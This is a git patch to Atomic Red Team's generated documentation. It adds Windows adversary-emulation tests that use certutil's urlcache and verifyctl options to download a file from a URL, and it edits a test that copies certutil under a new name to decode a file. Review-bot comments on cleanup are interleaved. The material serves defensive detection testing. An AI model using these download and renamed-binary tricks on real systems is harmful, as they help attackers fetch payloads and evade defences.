From a1c83527fb3c89979ffc11b5241a53cb047f100e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 14 Feb 2019 06:10:46 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1105/T1105.md | 46 ++++++++++++++++++++
 atomics/T1140/T1140.md | 2 +-
 atomics/index.md | 4 ++
 atomics/index.yaml | 92 +++++++++++++++++++++++++++++++++++++++-
 atomics/windows-index.md | 4 ++
 5 files changed, 146 insertions(+), 2 deletions(-)
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 7d0d43f8..f7915bdf 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -18,6 +18,10 @@ Adversaries may also copy files laterally between internal victim systems to sup
 - [Atomic Test #6 - sftp remote file copy (pull)](#atomic-test-6---sftp-remote-file-copy-pull)
+- [Atomic Test #7 - certutil download (urlcache)](#atomic-test-7---certutil-download-urlcache)
+
+- [Atomic Test #8 - certutil download (verifyctl)](#atomic-test-8---certutil-download-verifyctl)
+
@@ -145,3 +149,45 @@ Utilize sftp to perform a remote file copy (pull)
 sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
 ```
+
+
+## Atomic Test #7 - certutil download (urlcache)
+Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
+| local_path | Local path to place file | Path | Atomic-license.txt|
+#### Run it with `command_prompt`!
+```
+cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
+```
+
+
+
+## Atomic Test #8 - certutil download (verifyctl)
+Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
+| local_path | Local path to place file | Path | Atomic-license.txt|
+#### Run it with `powershell`!
+```
+$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
+New-Item -Path $datePath -ItemType Directory
+Set-Location $datePath
+certutil -verifyctl -split -f #{remote_file}
+Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
+```
+
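Review bot: The verifyctl executor in this hunk never restores or removes what it creates: `Set-Location $datePath` leaves the session inside the timestamped `certutil-…` directory, and neither that directory nor the files certutil writes into it are removed afterwards, so every run leaves a fresh artifact and no cleanup step is documented. Because `#{local_path}` is consumed after the `Set-Location`, the default `Atomic-license.txt` ends up inside the dated directory rather than where the test was launched, and the `Get-ChildItem | … Move-Item` pipeline appears to assume exactly one file survives the `-notlike "*.txt"` filter — a second match would collide on the same destination. Since this file is generated, the fix belongs in the source atomic definition: pair `Push-Location`/`Pop-Location` so the working directory is restored, make the directory name an input argument so a `cleanup_command` can delete it, and say in the description where the downloaded file lands. The same block is repeated in both index.yaml hunks of this commit.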
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index 0cefe524..6564c378 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -50,6 +50,6 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
 #### Run it with `command_prompt`!
 ```
 cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
-cmd.exe /c %temp%tcm.tmp -decode #{executable}
+cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
 ```
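Review bot: The new `-decode` line writes its output to `file.txt` in whatever directory the executor is running in, and nothing in the test removes it or the copied `tcm.tmp`, so repeated runs accumulate two artifacts; the identical line is mirrored in the index.yaml hunk for T1140 in this commit. The copy target `%temp%tcm.tmp` also looks like it is missing a path separator between the variable and the file name, which would place the renamed binary beside the temp directory rather than inside it — worth confirming against the source atomic definition and fixing there, not in this generated output. A `cleanup_command` that deletes both files would keep the test self-contained.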
diff --git a/atomics/index.md b/atomics/index.md
index a3a13a4f..0cb0b8b7 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -638,6 +638,8 @@
 - Atomic Test #4: scp remote file copy (pull) [linux, macos]
 - Atomic Test #5: sftp remote file copy (push) [linux, macos]
 - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+ - Atomic Test #7: certutil download (urlcache) [windows]
+ - Atomic Test #8: certutil download (verifyctl) [windows]
 - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -729,6 +731,8 @@
 - Atomic Test #4: scp remote file copy (pull) [linux, macos]
 - Atomic Test #5: sftp remote file copy (push) [linux, macos]
 - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+ - Atomic Test #7: certutil download (urlcache) [windows]
+ - Atomic Test #8: certutil download (verifyctl) [windows]
 - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 33d8956a..b00d80c0 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -5032,7 +5032,7 @@ defense-evasion:
 name: command_prompt
 command: |
 cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
- cmd.exe /c %temp%tcm.tmp -decode #{executable}
+ cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
 T1089:
 technique:
 id: attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044
@@ -17764,6 +17764,51 @@ lateral-movement:
 command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
 '
+ - name: certutil download (urlcache)
+ description: 'Use certutil -urlcache argument to download a file from the web.
+ Note - /urlcache also works!
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_file:
+ description: URL of file to copy
+ type: Url
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+ local_path:
+ description: Local path to place file
+ type: Path
+ default: Atomic-license.txt
+ executor:
+ name: command_prompt
+ command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
+
+'
+ - name: certutil download (verifyctl)
+ description: 'Use certutil -verifyctl argument to download a file from the web.
+ Note - /verifyctl also works!
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_file:
+ description: URL of file to copy
+ type: Url
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+ local_path:
+ description: Local path to place file
+ type: Path
+ default: Atomic-license.txt
+ executor:
+ name: powershell
+ command: |
+ $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
+ New-Item -Path $datePath -ItemType Directory
+ Set-Location $datePath
+ certutil -verifyctl -split -f #{remote_file}
+ Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
 T1077:
 technique:
 id: attack-pattern--ffe742ed-9100-4686-9e00-c331da544787
@@ -19561,6 +19606,51 @@ command-and-control:
 command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
 '
+ - name: certutil download (urlcache)
+ description: 'Use certutil -urlcache argument to download a file from the web.
+ Note - /urlcache also works!
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_file:
+ description: URL of file to copy
+ type: Url
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+ local_path:
+ description: Local path to place file
+ type: Path
+ default: Atomic-license.txt
+ executor:
+ name: command_prompt
+ command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
+
+'
+ - name: certutil download (verifyctl)
+ description: 'Use certutil -verifyctl argument to download a file from the web.
+ Note - /verifyctl also works!
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_file:
+ description: URL of file to copy
+ type: Url
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+ local_path:
+ description: Local path to place file
+ type: Path
+ default: Atomic-license.txt
+ executor:
+ name: powershell
+ command: |
+ $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
+ New-Item -Path $datePath -ItemType Directory
+ Set-Location $datePath
+ certutil -verifyctl -split -f #{remote_file}
+ Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
 T1065:
 technique:
 id: attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 7d81cc55..6c71eaf5 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -364,6 +364,8 @@
 - [T1076 Remote Desktop Protocol](./T1076/T1076.md)
 - Atomic Test #1: RDP [windows]
 - [T1105 Remote File Copy](./T1105/T1105.md)
+ - Atomic Test #7: certutil download (urlcache) [windows]
+ - Atomic Test #8: certutil download (verifyctl) [windows]
 - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -505,6 +507,8 @@
 - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1105 Remote File Copy](./T1105/T1105.md)
+ - Atomic Test #7: certutil download (urlcache) [windows]
+ - Atomic Test #8: certutil download (verifyctl) [windows]
 - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)